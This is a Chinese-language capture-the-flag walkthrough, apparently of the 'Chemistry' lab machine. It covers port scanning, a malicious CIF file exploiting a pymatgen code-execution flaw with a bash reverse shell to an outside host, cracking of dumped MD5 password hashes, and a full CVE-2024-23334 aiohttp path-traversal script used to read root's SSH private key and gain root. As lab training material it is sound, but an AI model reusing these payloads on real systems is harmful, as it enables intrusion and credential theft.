vps:10.10.11.38
靶机:10.10.16.17
信息收集
使用nmap对靶机进行端口扫描
使用 **nmap** 对靶机(IP:10.10.11.38)进行端口探测,命令如下: :
┌──(root㉿DESKTOP-K196DPF)-[/mnt/c/Users/Administrator/AppData/Local/Microsoft/WindowsApps]
└─# nmap -sV -sC 10.10.11.38 -O -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 23:41 CST
Nmap scan report for 10.10.11.38 (10.10.11.38)
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Sat, 07 Dec 2024 15:27:51 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
| Vary: Cookie
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Chemistry - Home</title>
| <link rel="stylesheet" href="/static/styles.css">
| </head>
| <body>
| <div class="container">
| class="title">Chemistry CIF Analyzer</h1>
| <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
| <div class="buttons">
| <center><a href="/login" class="btn">Login</a>
| href="/register" class="btn">Register</a></center>
| </div>
| </div>
| </body>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
- 端口分析:
- 22端口:开放了 SSH 服务,使用 OpenSSH 8.2p1
- 5000端口:开放了 Werkzeug 框架,版本为 3.0.3,使用 Python 3.9.5
使用dirb和dirsearch进行目录扫描
对目标 10.10.11.38:5000 进行目录扫描,使用 dirsearch 工具,命令如下: (dirb扫的太慢了,果断放弃):
Administrator on D:/Global/apps/dirsearch/current
# dirsearch -u http://10.10.11.38:5000
python3 "dirsearch.py" -u http://10.10.11.38:5000
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\Global\apps\dirsearch\current\reports\http_10.10.11.38_5000\_24-12-08_00-09-31.txt
Target: http://10.10.11.38:5000/
[00:09:31] Starting:
[00:11:21] 302 - 235B - /dashboard -> /login?next=%2Fdashboard
[00:12:17] 200 - 1KB - /login
[00:12:18] 302 - 229B - /logout -> /login?next=%2Flogout
[00:12:51] 200 - 1KB - /register
[00:13:19] 405 - 153B - /upload
Task Completed
存活目录:
- /login
- /register
使用searchsploit进行漏洞查找
使用 **searchsploit** 查找 Werkzeug 3.0.3 是否存在已知漏洞,命令如下:
Administrator@DESKTOP-K196DPF MINGW64 /d/Global/apps/searchsploit/current
$ searchsploit werkzeug 3.0.3
[i] Found (#1): /d/Global/apps/searchsploit/current/files_exploits.csv
[i] To remove this message, please edit "/d/Global/apps/searchsploit/current/.searchsploit_rc" which has "package_array: exploitdb" to point too: path_array+=("/d/Global/apps/searchsploit/current")
[i] Found (#1): /d/Global/apps/searchsploit/current/files_shellcodes.csv
[i] To remove this message, please edit "/d/Global/apps/searchsploit/current/.searchsploit_rc" which has "package_array: exploitdb" to point too: path_array+=("/d/Global/apps/searchsploit/current")
Exploits: No Results
Shellcodes: No Results
- ok,啥也没发现,安全
访问5000端口
访问5000端口开放的服务:
- 发现是一个登录页面
下角有一个注册页面
尝试使用admin进行注册,发现admin用户名已存在
重新使用test:test进行注册,发现可以登录进去:
登录进去后的页面如下:
- 要求我们上传一个CIF文件
Crystallographic Information File(CIF)是一种用于存储晶体结构信息的标准文件格式,通常用于存储X射线衍射、中子衍射、电子衍射等晶体结构分析的数据。CIF文件包含了晶胞参数、原子坐标、晶体对称性等结构信息,是进行晶体结构分析和制备的基础数据。
高大上,看不懂
漏洞利用
上线反弹shell
在网上查找关于CIF的RCE,找到了一个:https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f#/
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
将别人的EXP进行修改:
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'/bin/bash -i >& /dev/tcp/10.10.16.7/1425 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
**transform_BNS_Pp_abc**** 字段的恶意代码注入**:该字段通过注入反向 shell 命令,利用 pymatgen 解析 CIF 文件时执行攻击者指定的命令。
windwos使用cmd获取反弹shell:
nc -lnvp 1425
listening on [any] 1425 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.38] 50484
bash: cannot set terminal process group (1066): Inappropriate ioctl for device
bash: no job control in this shell
app@chemistry:~$ whoami
whoami
app
上线后的信息收集
app@chemistry:~$ ps
ps
PID TTY TIME CMD
1066 ? 00:08:17 python3.9
1515 ? 00:00:00 sh
1516 ? 00:00:00 bash
1517 ? 00:00:00 sh
1528 ? 00:00:00 python3
449380 ? 00:00:00 sh
449381 ? 00:00:01 ping
449478 ? 00:00:00 sh
449479 ? 00:00:01 ping
465951 ? 00:00:00 sh
465952 ? 00:00:00 bash
465953 ? 00:00:00 bash
465997 ? 00:00:00 ps
uname -a
Linux chemistry 5.4.0-196-generic #216-Ubuntu SMP Thu Aug 29 13:26:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
查看存在的账户:
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
app:x:1001:1001:,,,:/home/app:/bin/bash
- 发现存在root、rosa、app用户
使用sqlite3打开数据库文件
使用ls命令列出所有目录,发现/instance/目录下有一个database.db的数据库文件,使用sqlite3打开该文件,并列出表的内容
app@chemistry:~$ ls
ls
app.py
instance
pwned
static
templates
uploads
app@chemistry:~$ cd /home/app/instance
cd /home/app/instance
app@chemistry:~/instance$ ls
ls
database.db
app@chemistry:~/instance$ sqlite3 database.db
sqlite3 database.db
SELECT * FROM user;
1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
4|robert|02fcf7cfc10adc37959fb21f06c6b467
5|jobert|3dec299e06f7ed187bac06bd3b670ab2
6|carlos|9ad48828b0955513f7cf0f7f6510c8f8
7|peter|6845c17d298d95aa942127bdad2ceb9b
8|victoria|c3601ad2286a4293868ec2a4bc606ba3
9|tania|a4aa55e816205dc0389591c9f82f43bb
10|eusebio|6cad48078d0241cca9a7b322ecd073b3
11|gelacia|4af70c80b68267012ecdac9a7e916d18
12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0
13|axel|9347f9724ca083b17e39555c36fd9007
14|kristel|6896ba7b11a62cacffbdaded457c6d92
15|kali|d6ca3fd0c3a3b462ff2b83436dda495e
16|baiserderussie|eb843be1689a03a92d645c4a5e1f950d
17|kiaaa|8c88b09de022049eff4611518860ed5e
18|test|098f6bcd4621d373cade4e832627b4f6
- 1|admin|2861debaf8d99436a10ed6f75a252abf
- 2|app|197865e46b878d9e74a0346b6d59886a
- 3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
使用hash-identifier识别加密类型
使用hash-identifier工具进行加密类型识别:
┌──(root㉿DESKTOP-K196DPF)-[/mnt/c/Users/Administrator/AppData/Local/Microsoft/WindowsApps]
└─# hash-identifier
HASH: 2861debaf8d99436a10ed6f75a252abf
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
- 识别出来大概率都是md5
使用md5解密网站进行解密:
https://iotools.cloud/zh/tool/md5-decrypt/#/
- unicorniosrosados
(只能解密出来这一个rosa,其他的试了几百次都试不出来)
登录靶机ssh
使用破解出来的密码登录靶机的ssh:
ssh rosa@10.10.11.38
passwd:unicorniosrosados
rosa@chemistry:~$ whoami
rosa
flag1
在/home/rosa目录下有一个user.txt,使用cat命令查看文件内容,即可到flag1:
rosa@chemistry:~$ pwd
/home/rosa
rosa@chemistry:~$ ls
user.txt
rosa@chemistry:~$ cat user.txt
c92fa3176cb61bd0b0ec6790ed73200e
提权
尝试寻找有没有sudo和suid权限的命令:
rosa@chemistry:/$ sudo -l
[sudo] password for rosa:
Sorry, user rosa may not run sudo on chemistry.
- sudo没有
尝试suid:
rosa@chemistry:/$ find / -perm -u=s -type f 2>/dev/null
/snap/snapd/21759/usr/lib/snapd/snap-confine
/snap/core20/2379/usr/bin/chfn
/snap/core20/2379/usr/bin/chsh
/snap/core20/2379/usr/bin/gpasswd
/snap/core20/2379/usr/bin/mount
/snap/core20/2379/usr/bin/newgrp
/snap/core20/2379/usr/bin/passwd
/snap/core20/2379/usr/bin/su
/snap/core20/2379/usr/bin/sudo
/snap/core20/2379/usr/bin/umount
/snap/core20/2379/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2379/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/at
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
命令解释:
/ 表示从文件系统的顶部(根)开始,查找每个目录
-perm 表示搜索后面的权限
-u=s 表示查找 root 用户拥有的文件
-type 表示我们正在寻找的文件类型
f 表示普通文件,而不是目录或特殊文件
2 表示到进程的第二个文件描述符,即 stderr(标准错误)
> 表示重定向
/dev/null 是一个特殊的文件系统对象,它会丢弃写入其中的所有内容。
- 也无
使用ps -aux | grep root命令查看关于root用于相关的进程:
- 该进程是由
root用户运行的一个基于Python 3.9的程序,其脚本文件位于/opt/monitoring_site/app.py,可能是一个用于监控或管理的后台服务
查看一下/opt/monitoring_site/app.py:
rosa@chemistry:/$ cat /opt/monitoring_site/app.py
cat: /opt/monitoring_site/app.py: Permission denied
- 提示权限不够
查看靶机的网络连接状态:
rosa@chemistry:/$ ss -ant
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 128 0.0.0.0:5000 0.0.0.0:*
LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
SYN-SENT 0 1 10.10.11.38:36862 8.8.8.8:53
TIME-WAIT 0 0 10.10.11.38:5000 10.10.16.15:55950
TIME-WAIT 0 0 10.10.11.38:5000 10.10.16.15:55958
TIME-WAIT 0 0 10.10.11.38:5000 10.10.16.15:53626
ESTAB 0 0 10.10.11.38:22 10.10.14.37:59462
ESTAB 0 0 10.10.11.38:22 10.10.16.13:63470
ESTAB 0 0 10.10.11.38:5000 10.10.14.37:58326
TIME-WAIT 0 0 10.10.11.38:5000 10.10.16.15:55960
ESTAB 0 0 10.10.11.38:58456 10.10.14.37:80
LISTEN 0 128 [::]:22 [::]:*
- 看到本地有一个8080端口存在一个服务
看一下这个是什么服务
rosa@chemistry:~$ curl --head 127.0.0.1:8080
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5971
Date: Sun, 15 Dec 2024 08:23:21 GMT
Server: Python/3.9 aiohttp/3.9.1
- aiohttp/3.9.1
漏洞利用
去网上找下payload:
https://github.com/wizarddos/CVE-2024-23334#/
import argparse
import http.client
import textwrap
import urllib
def exploit(url, file, dir):
parsed_url = urllib.parse.urlparse(url)
conn = http.client.HTTPConnection(parsed_url.netloc)
traversal = "/.."
payload = dir
for i in range(15):
payload += traversal
print(f'''[+] Attempt {i}
Payload: {payload}{file}
''')
conn.request("GET", f"{parsed_url.path}{payload}{file}")
res = conn.getresponse()
result = res.read()
print(f" Status code: {res.status}")
if res.status == 200:
print("Respose: ")
print(result.decode())
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="PoC for CVE-2024-23334. LFI/Path-Traversal Vulnerability in Aiohttp",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent(''' Usage:
exploit.py -u http://127.0.0.1 -f /etc/passwd -d /static
''')
)
parser.add_argument('-u', '--url', help="Aiohttp site url")
parser.add_argument('-f', '--file', help="File to read")
parser.add_argument('-d', '--directory', help="Directory with static files. Default: /static", default="/static")
args = parser.parse_args()
if args.url and args.file and args.directory:
exploit(args.url, args.file, args.directory)
print("Exploit complete")
else:
print("Error: One of the parameters is missing")
- CVE-2024-23334是一个目录遍历漏洞
查看源代码:
rosa@chemistry:~$ curl 127.0.0.1:8080
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Site Monitoring</title>
<link rel="stylesheet" href="/assets/css/all.min.css">
<script src="/assets/js/jquery-3.6.0.min.js"></script>
<script src="/assets/js/chart.js"></script>
<link rel="stylesheet" href="/assets/css/style.css">
<style>
h2 {
color: black;
font-style: italic;
}
</style>
</head>
<body>
<nav class="navbar">
<div class="container">
<h1 class="logo"><i class="fas fa-chart-line"></i> Site Monitoring</h1>
<ul class="nav-links">
<li><a href="#" id="home"><i class="fas fa-home"></i> Home</a></li>
<li><a href="#" id="start-service"><i class="fas fa-play"></i> Start Service</a></li>
<li><a href="#" id="stop-service"><i class="fas fa-stop"></i> Stop Service</a></li>
<li><a href="#" id="list-services"><i class="fas fa-list"></i> List Services</a></li>
<li><a href="#" id="check-attacks"><i class="fas fa-exclamation-triangle"></i> Check Attacks</a></li>
</ul>
</div>
</nav>
<div class="container">
<div id="earnings">
<h2>2023 Earnings</h2>
<canvas id="earningsChart"></canvas>
</div>
<div id="views">
<h2>Views per Month</h2>
<canvas id="viewsChart"></canvas>
</div>
<div id="ad-clicks">
<h2>Ad Clicks per Visit</h2>
<canvas id="adClicksChart"></canvas>
</div>
<div id="service-list" style="display:none;">
<h2>Service List</h2>
<ul id="service-list-content">
<!-- Will be filled dynamically with JavaScript -->
</ul>
</div>
<div id="attack-logs" style="display:none;">
<h2>Possible Attacks</h2>
<h3><p style="color:red;">Functionality currently under development</p></h3>
<ul id="attack-logs-content">
</ul>
</div>
<div class="loader" id="loader" style="display:none;">Loading...</div>
</div>
<script src="/assets/js/script.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
const earnings = {"April": 3000, "August": 5000, "February": 2000, "January": 1500, "July": 4500, "June": 4000, "March": 2500, "May": 3500, "September": 5500};
const views = {"April": 40000, "August": 60000, "February": 30000, "January": 25000, "July": 55000, "June": 50000, "March": 35000, "May": 45000, "September": 65000};
const adClicks = {"Ad1": 650, "Ad2": 200, "Ad3": 1000};
// Earnings Chart Configuration
const earningsCtx = document.getElementById('earningsChart').getContext('2d');
const earningsChart = new Chart(earningsCtx, {
type: 'bar',
data: {
labels: Object.keys(earnings),
datasets: [{
label: 'Earnings ($)',
data: Object.values(earnings),
backgroundColor: 'rgba(75, 192, 192, 0.2)',
borderColor: 'rgba(75, 192, 192, 1)',
borderWidth: 1
}]
},
options: {
responsive: true,
scales: {
y: {
beginAtZero: true
}
}
}
});
// Views Chart Configuration
const viewsCtx = document.getElementById('viewsChart').getContext('2d');
const viewsChart = new Chart(viewsCtx, {
type: 'line',
data: {
labels: Object.keys(views),
datasets: [{
label: 'Views',
data: Object.values(views),
backgroundColor: 'rgba(153, 102, 255, 0.2)',
borderColor: 'rgba(153, 102, 255, 1)',
borderWidth: 1
}]
},
options: {
responsive: true,
scales: {
y: {
beginAtZero: true
}
}
}
});
// Ad Clicks Chart Configuration
const adClicksCtx = document.getElementById('adClicksChart').getContext('2d');
const adClicksChart = new Chart(adClicksCtx, {
type: 'pie',
data: {
labels: Object.keys(adClicks),
datasets: [{
label: 'Clicks',
data: Object.values(adClicks),
backgroundColor: [
'rgba(255, 99, 132, 0.2)',
'rgba(54, 162, 235, 0.2)',
'rgba(255, 206, 86, 0.2)',
'rgba(75, 192, 192, 0.2)',
'rgba(153, 102, 255, 0.2)',
'rgba(255, 159, 64, 0.2)'
],
borderColor: [
'rgba(255, 99, 132, 1)',
'rgba(54, 162, 235, 1)',
'rgba(255, 206, 86, 1)',
'rgba(75, 192, 192, 1)',
'rgba(153, 102, 255, 1)',
'rgba(255, 159, 64, 1)'
],
borderWidth: 1
}]
},
options: {
responsive: true
}
});
});
</script>
</body>
</html>
- 得到该页面的静态目录为:/assets
exp用法:exploit.py -u http://127.0.0.1 -f /etc/passwd -d /static
由于主机存在问题,无法通过 SSH 转发端口,因此直接在靶机上创建一个 test.py 文件,将 exploit 代码写入并执行。”
rosa@chemistry:~$ vim test.py
rosa@chemistry:~$ [New] 50L, 1522C written
rosa@chemistry:~$ ls
test.py user.txt
rosa@chemistry:~$ python test.py -u http://127.0.0.1:8080 -f /etc/passwd -d /assets
Command 'python' not found, did you mean:
command 'python3' from deb python3
command 'python' from deb python-is-python3
rosa@chemistry:~$ python3 test.py -u http://127.0.0.1:8080 -f /etc/passwd -d /assets
[+] Attempt 0
Payload: /assets/../etc/passwd
Status code: 404
[+] Attempt 1
Payload: /assets/../../etc/passwd
Status code: 404
[+] Attempt 2
Payload: /assets/../../../etc/passwd
Status code: 200
Respose:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
Exploit complete
- 成功地进行了目录遍历攻击,成功获取了
/etc/passwd文件的内容。
读取SSH私钥
读取ssh私钥,指定/assets目录:
rosa@chemistry:~$ python3 test.py -u http://127.0.0.1:8080 -f /root/.ssh/id_rsa -d /assets
[+] Attempt 0
Payload: /assets/../root/.ssh/id_rsa
Status code: 404
[+] Attempt 1
Payload: /assets/../../root/.ssh/id_rsa
Status code: 404
[+] Attempt 2
Payload: /assets/../../../root/.ssh/id_rsa
Status code: 200
Respose:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Exploit complete
新建立一个key文件,把密钥存放进去:
rosa@chemistry:~$ vim key
rosa@chemistry:~$ [New] 36L, 2532C written
rosa@chemistry:~$ ls
key test.py user.txt
给密钥赋权,存放该rsa密钥:
chmod 000 key
使用本地的 key 私钥文件,通过 SSH 协议登录到 10.10.11.38 服务器的 root 用户
rosa@chemistry:~$ ssh root@10.10.11.38 -i key
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun 15 Dec 2024 12:07:59 PM UTC
System load: 0.0
Usage of /: 78.0% of 5.08GB
Memory usage: 34%
Swap usage: 0%
Processes: 244
Users logged in: 1
IPv4 address for eth0: 10.10.11.38
IPv6 address for eth0: dead:beef::250:56ff:feb9:b2fa
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Oct 11 14:06:59 2024
root@chemistry:~# whoami
root
- 成功登录
在目标目录下,可以发现一个名为 **root.txt** 的文件。通过使用 cat 命令查看该文件的内容,即可获取最终的 Flag。
bash
复制代码
root@chemistry:~# ls
root.txt
root@chemistry:~# cat root.txt
完结
至此,靶机流程的最终目标达成。 (๑•̀ㅂ•́)و✧
